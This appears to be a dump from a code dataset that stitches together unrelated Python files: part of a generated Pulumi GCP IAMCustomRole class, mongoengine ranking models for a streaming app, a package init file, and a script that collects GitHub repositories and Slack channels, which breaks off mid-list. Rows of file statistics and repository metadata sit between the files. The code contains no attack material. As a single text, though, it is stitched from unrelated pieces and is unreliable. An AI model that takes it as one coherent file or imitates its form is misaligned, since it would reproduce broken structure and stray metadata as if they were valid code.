The camel case role id to use for this role. Cannot contain `-` characters.
"""
return pulumi.get(self, "role_id")
@role_id.setter
def role_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_id", value)
@property
@pulumi.getter
def stage(self) -> Optional[pulumi.Input[str]]:
"""
The current launch stage of the role.
Defaults to `GA`.
List of possible stages is [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
"""
return pulumi.get(self, "stage")
@stage.setter
def stage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "stage", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
A human-readable title for the role.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
class IAMCustomRole(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
project: Optional[pulumi.Input[str]] = None,
role_id: Optional[pulumi.Input[str]] = None,
stage: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Allows management of a customized Cloud IAM project role. For more information see
[the official documentation](https://cloud.google.com/iam/docs/understanding-custom-roles)
and
[API](https://cloud.google.com/iam/reference/rest/v1/projects.roles).
> **Warning:** Note that custom roles in GCP have the concept of a soft-delete. There are two issues that may arise
from this and how roles are propagated. 1) creating a role may involve undeleting and then updating a role with the
same name, possibly causing confusing behavior between undelete and update. 2) A deleted role is permanently deleted
after 7 days, but it can take up to 30 more days (i.e. between 7 and 37 days after deletion) before the role name is
made available again. This means a deleted role that has been deleted for more than 7 days cannot be changed at all
by the provider, and new roles cannot share that name.
## Example Usage
This snippet creates a customized IAM role.
```python
import pulumi
import pulumi_gcp as gcp
my_custom_role = gcp.projects.IAMCustomRole("my-custom-role",
description="A description",
permissions=[
"iam.roles.list",
"iam.roles.create",
"iam.roles.delete",
],
role_id="myCustomRole",
title="My Custom Role")
```
## Import
Custom Roles can be imported using any of these accepted formats
```sh
$ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default projects/{{project}}/roles/{{role_id}}
```
```sh
$ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default {{project}}/{{role_id}}
```
```sh
$ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default {{role_id}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: A human-readable description for the role.
:param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: The names of the permissions this role grants when bound in an IAM policy. At least one permission must be specified.
:param pulumi.Input[str] project: The project that the service account will be created in.
Defaults to the provider project configuration.
:param pulumi.Input[str] role_id: The camel case role id to use for this role. Cannot contain `-` characters.
:param pulumi.Input[str] stage: The current launch stage of the role.
Defaults to `GA`.
List of possible stages is [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
:param pulumi.Input[str] title: A human-readable title for the role.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: IAMCustomRoleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows management of a customized Cloud IAM project role. For more information see
[the official documentation](https://cloud.google.com/iam/docs/understanding-custom-roles)
and
[API](https://cloud.google.com/iam/reference/rest/v1/projects.roles).
> **Warning:** Note that custom roles in GCP have the concept of a soft-delete. There are two issues that may arise
from this and how roles are propagated. 1) creating a role may involve undeleting and then updating a role with the
same name, possibly causing confusing behavior between undelete and update. 2) A deleted role is permanently deleted
after 7 days, but it can take up to 30 more days (i.e. between 7 and 37 days after deletion) before the role name is
made available again. This means a deleted role that has been deleted for more than 7 days cannot be changed at all
by the provider, and new roles cannot share that name.
## Example Usage
This snippet creates a customized IAM role.
```python
import pulumi
import pulumi_gcp as gcp
my_custom_role = gcp.projects.IAMCustomRole("my-custom-role",
description="A description",
permissions=[
"iam.roles.list",
"iam.roles.create",
"iam.roles.delete",
],
role_id="myCustomRole",
title="My Custom Role")
```
## Import
Custom Roles can be imported using any of these accepted formats
```sh
$ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default projects/{{project}}/roles/{{role_id}}
```
```sh
$ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default {{project}}/{{role_id}}
```
```sh
$ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default {{role_id}}
```
:param str resource_name: The name of the resource.
:param IAMCustomRoleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(IAMCustomRoleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
project: Optional[pulumi.Input[str]] = None,
role_id: Optional[pulumi.Input[str]] = None,
stage: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = IAMCustomRoleArgs.__new__(IAMCustomRoleArgs)
__props__.__dict__["description"] = description
if permissions is None and not opts.urn:
raise TypeError("Missing required property 'permissions'")
__props__.__dict__["permissions"] = permissions
__props__.__dict__["project"] = project
if role_id is None and not opts.urn:
raise TypeError("Missing required property 'role_id'")
__props__.__dict__["role_id"] = role_id
__props__.__dict__["stage"] = stage
if title is None and not opts.urn:
raise TypeError("Missing required property 'title'")
__props__.__dict__["title"] = title
__props__.__dict__["deleted"] = None
__props__.__dict__["name"] = None
super(IAMCustomRole, __self__).__init__(
'gcp:projects/iAMCustomRole:IAMCustomRole',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
deleted: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
project: Optional[pulumi.Input[str]] = None,
role_id: Optional[pulumi.Input[str]] = None,
stage: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None) -> 'IAMCustomRole':
"""
Get an existing IAMCustomRole resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] deleted: (Optional) The current deleted state of the role.
:param pulumi.Input[str] description: A human-readable description for the role.
:param pulumi.Input[str] name: The name of the role in the format `projects/{{project}}/roles/{{role_id}}`. Like `id`, this field can be used as a reference in other resources such as IAM role bindings.
:param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: The names of the permissions this role grants when bound in an IAM policy. At least one permission must be specified.
:param pulumi.Input[str] project: The project that the service account will be created in.
Defaults to the provider project configuration.
:param pulumi.Input[str] role_id: The camel case role id to use for this role. Cannot contain `-` characters.
:param pulumi.Input[str] stage: The current launch stage of the role.
Defaults to `GA`.
List of possible stages is [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
:param pulumi.Input[str] title: A human-readable title for the role.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _IAMCustomRoleState.__new__(_IAMCustomRoleState)
__props__.__dict__["deleted"] = deleted
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["permissions"] = permissions
__props__.__dict__["project"] = project
__props__.__dict__["role_id"] = role_id
__props__.__dict__["stage"] = stage
__props__.__dict__["title"] = title
return IAMCustomRole(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def deleted(self) -> pulumi.Output[bool]:
"""
(Optional) The current deleted state of the role.
"""
return pulumi.get(self, "deleted")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A human-readable description for the role.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the role in the format `projects/{{project}}/roles/{{role_id}}`. Like `id`, this field can be used as a reference in other resources such as IAM role bindings.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def permissions(self) -> pulumi.Output[Sequence[str]]:
"""
The names of the permissions this role grants when bound in an IAM policy. At least one permission must be specified.
"""
return pulumi.get(self, "permissions")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The project that the service account will be created in.
Defaults to the provider project configuration.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="roleId")
def role_id(self) -> pulumi.Output[str]:
"""
The camel case role id to use for this role. Cannot contain `-` characters.
"""
return pulumi.get(self, "role_id")
@property
@pulumi.getter
def stage(self) -> pulumi.Output[Optional[str]]:
"""
The current launch stage of the role.
Defaults to `GA`.
List of possible stages is [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
"""
return pulumi.get(self, "stage")
@property
@pulumi.getter
def title(self) -> pulumi.Output[str]:
"""
A human-readable title for the role.
"""
return pulumi.get(self, "title")
| 42.83906 | 210 | 0.631828 | 2,861 | 23,690 | 5.099266 | 0.090528 | 0.080677 | 0.082528 | 0.064843 | 0.860717 | 0.836589 | 0.803756 | 0.783056 | 0.768456 | 0.762492 | 0 | 0.001608 | 0.264795 | 23,690 | 552 | 211 | 42.916667 | 0.836022 | 0.431659 | 0 | 0.664179 | 1 | 0 | 0.071519 | 0.003386 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160448 | false | 0.003731 | 0.018657 | 0 | 0.276119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae00726a2d5285febe97ce79d80fabc440a0c6b9 | 3,761 | py | Python | app/customer/models/rank.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | 2 | 2017-12-02T13:58:30.000Z | 2018-08-02T17:07:59.000Z | app/customer/models/rank.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | app/customer/models/rank.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from django.db import models
from mongoengine import *
from base.settings import CHATPAMONGO
class CharmRank(Document):
CHANGE = [
(0, u"不变"),
(1, u"上升"),
(2, u"下降"),
]
user = GenericReferenceField("User", verbose_name=u'用户')
charm = IntField(verbose_name=u"主播近三天魅力值")
change_status = IntField(verbose_name=u"较上次位置变化情况")
type = IntField(verbose_name=u"榜单类型")
rank = IntField(verbose_name=u"当前排名", default=0)
@classmethod
def get_rank_list(self, interval, count):
charm_rank_list = CharmRank.objects.filter(rank__lte=count)
return charm_rank_list
class WealthRank(Document):
CHANGE = [
(0, u"不变"),
(1, u"上升"),
(2, u"下降"),
]
user = GenericReferenceField("User", verbose_name=u'用户')
wealth = IntField(verbose_name=u"用户近三天财富值")
change_status = IntField(verbose_name=u"较上次位置变化情况")
rank = IntField(verbose_name=u"当前排名")
type = IntField(verbose_name=u"榜单类型") # 1:周榜 2:日榜
@classmethod
def get_rank_list(self, interval, count):
wealth_rank_list = WealthRank.objects.filter(rank__lte=count)
return wealth_rank_list
class InviteRank(Document):
"""
用于5月13日--5月26日活动:显示邀请人数前五的用户
"""
head_image = StringField(verbose_name=u"用户头像")
nickname = StringField(verbose_name=u"用户昵称")
uid = IntField(verbose_name=u"用户长id")
invite_num = IntField(verbose_name=u"邀请人数")
rank = IntField(verbose_name=u"邀请排行")
@classmethod
def get_top_5(cls):
return InviteRank.objects.all()
class InviteRankTwo(Document):
"""
用于5月20日--5月26日活动:显示邀请人数前五的用户
"""
head_image = StringField(verbose_name=u"用户头像")
nickname = StringField(verbose_name=u"用户昵称")
uid = IntField(verbose_name=u"用户长id")
invite_num = IntField(verbose_name=u"邀请人数")
rank = IntField(verbose_name=u"邀请排行")
@classmethod
def get_top_5(cls):
return InviteRankTwo.objects.all()
class NewAnchorRank(Document):
"""
新人驾到 列表
"""
user_id = IntField(verbose_name=u"用户id")
class ClairvoyantRank(Document):
user_id = IntField(verbose_name=u"用户id")
class CharmRankNew(Document):
CHANGE = [
(0, u"不变"),
(1, u"上升"),
(2, u"下降"),
]
user = GenericReferenceField("User", verbose_name=u'用户')
charm = IntField(verbose_name=u"主播近三天魅力值")
change_status = IntField(verbose_name=u"较上次位置变化情况")
type = IntField(verbose_name=u"榜单类型") # 1:周榜 2:日榜
rank = IntField(verbose_name=u"当前排名", default=0)
@classmethod
def get_rank_list(self, count, type):
charm_rank_list = CharmRankNew.objects.filter(rank__lte=count, type=int(type))
return charm_rank_list
class WealthRankNew(Document):
CHANGE = [
(0, u"不变"),
(1, u"上升"),
(2, u"下降"),
]
user = GenericReferenceField("User", verbose_name=u'用户')
wealth = IntField(verbose_name=u"用户近三天财富值")
change_status = IntField(verbose_name=u"较上次位置变化情况")
rank = IntField(verbose_name=u"当前排名")
type = IntField(verbose_name=u"榜单类型") # 1:周榜 2:日榜
@classmethod
def get_rank_list(self, count, type):
wealth_rank_list = WealthRankNew.objects.filter(rank__lte=count, type=int(type))
return wealth_rank_list
# 清纯主播美丽排行榜
class PureCharmRank(Document):
user = GenericReferenceField("User", verbose_name=u'用户')
charm = IntField(verbose_name=u"主播近三天魅力值")
change_status = IntField(verbose_name=u"较上次位置变化情况")
type = IntField(verbose_name=u"榜单类型") # 1:周榜 2:日榜
rank = IntField(verbose_name=u"当前排名", default=0)
@classmethod
def get_rank_list(cls):
charm_rank_list = PureCharmRank.objects.all()
return charm_rank_list
| 23.803797 | 88 | 0.659133 | 478 | 3,761 | 4.997908 | 0.182008 | 0.170364 | 0.185852 | 0.234408 | 0.783591 | 0.768522 | 0.74257 | 0.74257 | 0.694851 | 0.65969 | 0 | 0.012851 | 0.213773 | 3,761 | 157 | 89 | 23.955414 | 0.795063 | 0.035895 | 0 | 0.747368 | 0 | 0 | 0.064344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073684 | false | 0 | 0.031579 | 0.021053 | 0.705263 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
bb0310c2f2ffb782b05bc1aa7afea00b914c1bd6 | 37 | py | Python | app/app/__init__.py | bcgov/nr-site | 0582426f71db9a8f0b0d95fd9ac3ee295f9757fc | [
"Apache-2.0"
] | null | null | null | app/app/__init__.py | bcgov/nr-site | 0582426f71db9a8f0b0d95fd9ac3ee295f9757fc | [
"Apache-2.0"
] | 4 | 2022-02-05T00:44:56.000Z | 2022-02-26T23:54:17.000Z | app/app/__init__.py | bcgov/nr-site | 0582426f71db9a8f0b0d95fd9ac3ee295f9757fc | [
"Apache-2.0"
] | 1 | 2021-11-16T19:28:25.000Z | 2021-11-16T19:28:25.000Z | import app.models
import app.schemas
| 12.333333 | 18 | 0.837838 | 6 | 37 | 5.166667 | 0.666667 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 2 | 19 | 18.5 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
249cb6c6e0328fe2d255b36cf450971de088aa02 | 26,581 | py | Python | get_projects.py | open-craft/metrics-dashboard | a8ef79b5bd98c601a9171b2eeb6fe549a062b2e1 | [
"Apache-2.0"
] | 2 | 2019-06-11T03:14:34.000Z | 2019-12-12T23:34:28.000Z | get_projects.py | open-craft/metrics-dashboard | a8ef79b5bd98c601a9171b2eeb6fe549a062b2e1 | [
"Apache-2.0"
] | 7 | 2021-01-28T16:54:37.000Z | 2021-10-15T19:17:52.000Z | get_projects.py | open-craft/metrics-dashboard | a8ef79b5bd98c601a9171b2eeb6fe549a062b2e1 | [
"Apache-2.0"
] | 1 | 2021-07-21T08:28:47.000Z | 2021-07-21T08:28:47.000Z | """
Gets all of the repos/channels for a grimoirelabs project
"""
import os
import github3
import json
from slack import WebClient
def create_projects(projects, config):
git_token = config['github']['api-token']
slack_token = config['slack']['api-token']
discourse_token = config['discourse']['api-token']
for key in projects:
if 'git' in projects[key] and 'http' not in projects[key]['git']:
git_repos = []
for organization in projects[key]['git']:
git_repos.extend(get_git_repos(organization, git_token))
projects[key]['git'] = git_repos
projects[key]['github'] = git_repos
projects[key]['github:repo'] = git_repos
if 'slack' in projects[key] and projects[key]['slack'] == []:
projects[key]['slack'] = get_slack_channels(slack_token)
if 'discourse' in projects[key] and projects[key]['discourse'] == []:
projects[key]['discourse'] = ["https://discuss.openedx.org"]
return projects
def get_git_repos(org, token):
gh = github3.login(token = token)
repos = gh.organization(org).repositories('public')
repo_list = []
for repo in repos:
if not repo.fork:
repo_list.append(repo.html_url)
return repo_list
def get_slack_channels(token):
client = WebClient(token=token)
channels = client.conversations_list(exclude_archived=True)
channel_list = []
for channel in channels['channels']:
channel_list.append(channel['id'])
return channel_list
if __name__ == '__main__':
'''
Test 1: Tests automatically filling the values for the
project for both a github organization and a slack workspace.
Passes when length of projects for slack is equivalent to number of
channels and length of projects for github is equivalent to the
number of public repos for a github organization.
'''
projects1 = {
"Open edX": {
"git": [ "edx"],
"github": [],
"github:repo": [],
"slack": [],
"discourse": []
}
}
config1 = {
'github' : {'api-token' : os.environ['GITHUB_KEY']}, #use correct tokens here
'slack' : {'api-token' : os.environ['SLACK_KEY']},
'discourse' : {'api-token' : os.environ['DISCOURSE_KEY']}
}
create_projects(projects1, config1)
if len(projects1['Open edX']['slack']) == 154 and len(projects1['Open edX']['github']) == 224:
print('Test 1 Passed: Filling in projects for Git and Slack')
else:
print(len(projects1['Open edX']['github']))
print(len(projects1['Open edX']['slack']))
'''
Test 2: Tests automatically filling the values for the
project for only a slack workspace.
Passes when length of projects for slack is equivalent to number of
channels and length of projects for github is equivalent to the
specified projects.
'''
projects2 = {
"Open edX": {
"git": [ 'https://github.com/edx/publisher-frontend'],
"github": ['https://github.com/edx/publisher-frontend'],
"github:repos": ['https://github.com/edx/publisher-frontend'],
"slack": []
}
}
create_projects(projects2, config1)
if len(projects2['Open edX']['slack']) == 154 and len(projects2['Open edX']['github']) == 1:
print('Test 2 Passed: Filling in projects for only Slack')
else:
'''print('Test 2 failed:\n Length of slack:'
+ len(projects1['Open edX']['slack'])
+ '\nLength of github: ' + len(projects2['Open edX']['github']))''' #need to fix this
'''
Test 3: Tests that this fills in values for multiple projects within the same
dictionary.
Passes if length for each part (i.e. github, slack) of each project is
correct (i.e. equal to the number of channels, number of public repositories,
number of specified repos, number of specified channels).
'''
projects3 = {
"Open edX": {
"git": [ 'https://github.com/edx/publisher-frontend'],
"github": ['https://github.com/edx/publisher-frontend'],
"github:repos": ['https://github.com/edx/publisher-frontend'],
"slack": []
},
"Test": {
"git": ['openedx'],
"github": [],
"github:repos": [],
"slack": ['test']
}
}
create_projects(projects3, config1)
if (len(projects3['Open edX']['slack']) == 154 and
len(projects3['Open edX']['github']) == 1 and
len(projects3['Test']['slack']) == 1 and
len(projects3['Test']['github']) == 3):
print('Test 3 Passed: Testing multiple projects')
'''
Test 4: Tests with our data
'''
projects4 = {"Open edX": {"git": ["https://github.com/edx/cs_comments_service", "https://github.com/edx/xqueue", "https://github.com/edx/django-wiki", "https://github.com/edx/ease", "https://github.com/edx/edx-ora", "https://github.com/edx/loghandlersplus", "https://github.com/edx/XBlock", "https://github.com/edx/djeventstream", "https://github.com/edx/insights", "https://github.com/edx/edxanalytics", "https://github.com/edx/archived-edx.github.io", "https://github.com/edx/configuration", "https://github.com/edx/codejail", "https://github.com/edx/arch-prototype", "https://github.com/edx/skel", "https://github.com/edx/edx-platform", "https://github.com/edx/xserver", "https://github.com/edx/edx-tools", "https://github.com/edx/js-test-tool", "https://github.com/edx/notifier", "https://github.com/edx/event-tracking", "https://github.com/edx/git-client-plugin", "https://github.com/edx/edx-demo-course", "https://github.com/edx/patch-juggler", "https://github.com/edx/repo-tools", "https://github.com/edx/git-plugin", "https://github.com/edx/edx-e2e-tests", "https://github.com/edx/bok-choy", "https://github.com/edx/asgard", "https://github.com/edx/datajam", "https://github.com/edx/datajam-analytics", "https://github.com/edx/edx-ora2", "https://github.com/edx/test-metrics", "https://github.com/edx/acid-block", "https://github.com/edx/xblock-sdk", "https://github.com/edx/edx-certificates", "https://github.com/edx/xqueue-watcher", "https://github.com/edx/dogapi", "https://github.com/edx/alton", "https://github.com/edx/opaque-keys", "https://github.com/edx/edx-analytics-data-api", "https://github.com/edx/i18n-tools", "https://github.com/edx/edx-submissions", "https://github.com/edx/edx-analytics-dashboard", "https://github.com/edx/django-oauth2-provider", "https://github.com/edx/edx-val", "https://github.com/edx/openedx-webhooks", "https://github.com/edx/edx-analytics-configuration", "https://github.com/edx/edx-analytics-data-api-client", "https://github.com/edx/edx-analytics-pipeline", "https://github.com/edx/edx-oauth2-provider", "https://github.com/edx/django-lang-pref-middleware", "https://github.com/edx/edx-documentation", "https://github.com/edx/luigi", "https://github.com/edx/xblock-utils", "https://github.com/edx/edx-fonts", "https://github.com/edx/edx-analytics-api-client", "https://github.com/edx/harprofiler", "https://github.com/edx/MongoDBProxy", "https://github.com/edx/edx-notes-api", "https://github.com/edx/edx-analytics-hadoop-util", "https://github.com/edx/edx-milestones", "https://github.com/edx/edx-django-profiler", "https://github.com/edx/edx-notifications", "https://github.com/edx/edx-app-ios", "https://github.com/edx/edx-app-android", "https://github.com/edx/edx-search", "https://github.com/edx/ux-pattern-library", "https://github.com/edx/pyinstrument", "https://github.com/edx/edx-lint", "https://github.com/edx/ecommerce", "https://github.com/edx/auth-backends", "https://github.com/edx/edx-app-gradle-plugin", "https://github.com/edx/testeng-ci", "https://github.com/edx/edx-reverification-block", "https://github.com/edx/edx-rest-api-client", "https://github.com/edx/thumb-stack", "https://github.com/edx/edx-common-client", "https://github.com/edx/edx-proctoring", "https://github.com/edx/edx-user-state-client", "https://github.com/edx/ecommerce-scripts", "https://github.com/edx/edx-organizations", "https://github.com/edx/ccx-keys", "https://github.com/edx/discussions", "https://github.com/edx/edx-load-tests", "https://github.com/edx/xsy", "https://github.com/edx/edx-ui-toolkit", "https://github.com/edx/openedx-conference-pages", "https://github.com/edx/django-rest-framework-oauth", "https://github.com/edx/cookiecutter-django-ida", "https://github.com/edx/programs", "https://github.com/edx/demo-performance-course", "https://github.com/edx/ecommerce-worker", "https://github.com/edx/django-openid-auth", "https://github.com/edx/django-pyfs", "https://github.com/edx/django-rest-framework", "https://github.com/edx/demo-test-course", "https://github.com/edx/build-pipeline", "https://github.com/edx/edx-custom-a11y-rules", "https://github.com/edx/django-splash", "https://github.com/edx/edx-analytics-exporter", "https://github.com/edx/xblock-lti-consumer", "https://github.com/edx/course-discovery", "https://github.com/edx/credentials", "https://github.com/edx/edx-django-extensions", "https://github.com/edx/edx-grader-support", "https://github.com/edx/tubular", "https://github.com/edx/dummy-webapp", "https://github.com/edx/edx-capa", "https://github.com/edx/edx-django-release-util", "https://github.com/edx/edx-drf-extensions", "https://github.com/edx/edx-django-sites-extensions", "https://github.com/edx/pa11ycrawler", "https://github.com/edx/open-edx-proposals", "https://github.com/edx/edx-icon", "https://github.com/edx/api-manager", "https://github.com/edx/sample-themes", "https://github.com/edx/jenkins-job-dsl", "https://github.com/edx/openedxstats", "https://github.com/edx/gomatic", "https://github.com/edx/edx-safety", "https://github.com/edx/edx-gomatic", "https://github.com/edx/eslint-config-edx", "https://github.com/edx/cookiecutter-django-app", "https://github.com/edx/vagrant-timer", "https://github.com/edx/edx-app-android-white-label-demo", "https://github.com/edx/cookiecutter-xblock", "https://github.com/edx/django-user-tasks", "https://github.com/edx/notifications", "https://github.com/edx/notifications-pipeline-steps", "https://github.com/edx/edx-sphinx-theme", "https://github.com/edx/django-config-models", "https://github.com/edx/edx-enterprise", "https://github.com/edx/web-fragments", "https://github.com/edx/devstack", "https://github.com/edx/pa11ycrawler-ignore", "https://github.com/edx/edx-celeryutils", "https://github.com/edx/edx-salesforce", "https://github.com/edx/credentials-themes", "https://github.com/edx/help-tokens", "https://github.com/edx/paragon", "https://github.com/edx/language-negotiation-lambda", "https://github.com/edx/edx-docker-base", "https://github.com/edx/jenkins-configuration", "https://github.com/edx/py-opt-cli", "https://github.com/edx/supported-components", "https://github.com/edx/bootstrapped", "https://github.com/edx/edx-bootstrap", "https://github.com/edx/edx-video-pipeline", "https://github.com/edx/edx-video-worker", "https://github.com/edx/ConceptXBlock", "https://github.com/edx/AudioXBlock", "https://github.com/edx/RecommenderXBlock", "https://github.com/edx/AnimationXBlock", "https://github.com/edx/RateXBlock", "https://github.com/edx/DoneXBlock", "https://github.com/edx/django-celery", "https://github.com/edx/edx-ace", "https://github.com/edx/studio-frontend", "https://github.com/edx/stylelint-config-edx", "https://github.com/edx/xblock-review", "https://github.com/edx/django-oauth-plus", "https://github.com/edx/edx-enterprise-data", "https://github.com/edx/analytics-python", "https://github.com/edx/edx-app-test", "https://github.com/edx/edx-app-qa", "https://github.com/edx/completion", "https://github.com/edx/openedx-census", "https://github.com/edx/frontend-cookie-cutter-application", "https://github.com/edx/journals", "https://github.com/edx/user-util", "https://github.com/edx/XSS-Linter", "https://github.com/edx/cookie-policy-banner", "https://github.com/edx/xapi-events", "https://github.com/edx/create-edx-react-app", "https://github.com/edx/docs.edx.org", "https://github.com/edx/chunkey", "https://github.com/edx/v_videocompile", "https://github.com/edx/edx-portal", "https://github.com/edx/cookie-cutter-react-component-library", "https://github.com/edx/floor-plan-connector", "https://github.com/edx/journals-frontend", "https://github.com/edx/django-plugins", "https://github.com/edx/edx-toggles", "https://github.com/edx/TinCanPython", "https://github.com/edx/edx-django-utils", "https://github.com/edx/frontend-cookiecutter-library", "https://github.com/edx/vertica_docker", "https://github.com/edx/xss-utils", "https://github.com/edx/frontend-auth", "https://github.com/edx/edx-developer-docs", "https://github.com/edx/gradebook", "https://github.com/edx/mockprock", "https://github.com/edx/code-annotations", "https://github.com/edx/cypress-e2e-tests", "https://github.com/edx/publisher-frontend", "https://github.com/edx/mdrst", "https://github.com/edx/frontend-component-footer", "https://github.com/edx/frontend-component-site-header", "https://github.com/edx/frontend-app-profile", "https://github.com/edx/hermes", "https://github.com/edx/registrar", "https://github.com/edx/asym-crypto-yaml", "https://github.com/edx/edx-rbac", "https://github.com/edx/edx-when", "https://github.com/edx/crowdsourcehinter", "https://github.com/edx/html-webpack-new-relic-plugin", "https://github.com/edx/frontend-app-learner-portal", "https://github.com/edx/frontend-analytics", "https://github.com/edx/frontend-logging", "https://github.com/edx/frontend-app-ecommerce", "https://github.com/edx/openedx-calc", "https://github.com/edx/frontend-app-account", "https://github.com/edx/frontend-common", "https://github.com/edx/edx-zoom", "https://github.com/edx/portal-designer", "https://github.com/edx/frontend-app-payment", "https://github.com/edx/openedx-chem", "https://github.com/edx/frontend-i18n", "https://github.com/edx/staff_graded-xblock", "https://github.com/edx/super-csv", "https://github.com/edx/frontend-app-program-manager", "https://github.com/edx/edx-bulk-grades", "https://github.com/edx/edx4edx_lite"], "github": ["https://github.com/edx/cs_comments_service", "https://github.com/edx/xqueue", "https://github.com/edx/django-wiki", "https://github.com/edx/ease", "https://github.com/edx/edx-ora", "https://github.com/edx/loghandlersplus", "https://github.com/edx/XBlock", "https://github.com/edx/djeventstream", "https://github.com/edx/insights", "https://github.com/edx/edxanalytics", "https://github.com/edx/archived-edx.github.io", "https://github.com/edx/configuration", "https://github.com/edx/codejail", "https://github.com/edx/arch-prototype", "https://github.com/edx/skel", "https://github.com/edx/edx-platform", "https://github.com/edx/xserver", "https://github.com/edx/edx-tools", "https://github.com/edx/js-test-tool", "https://github.com/edx/notifier", "https://github.com/edx/event-tracking", "https://github.com/edx/git-client-plugin", "https://github.com/edx/edx-demo-course", "https://github.com/edx/patch-juggler", "https://github.com/edx/repo-tools", "https://github.com/edx/git-plugin", "https://github.com/edx/edx-e2e-tests", "https://github.com/edx/bok-choy", "https://github.com/edx/asgard", "https://github.com/edx/datajam", "https://github.com/edx/datajam-analytics", "https://github.com/edx/edx-ora2", "https://github.com/edx/test-metrics", "https://github.com/edx/acid-block", "https://github.com/edx/xblock-sdk", "https://github.com/edx/edx-certificates", "https://github.com/edx/xqueue-watcher", "https://github.com/edx/dogapi", 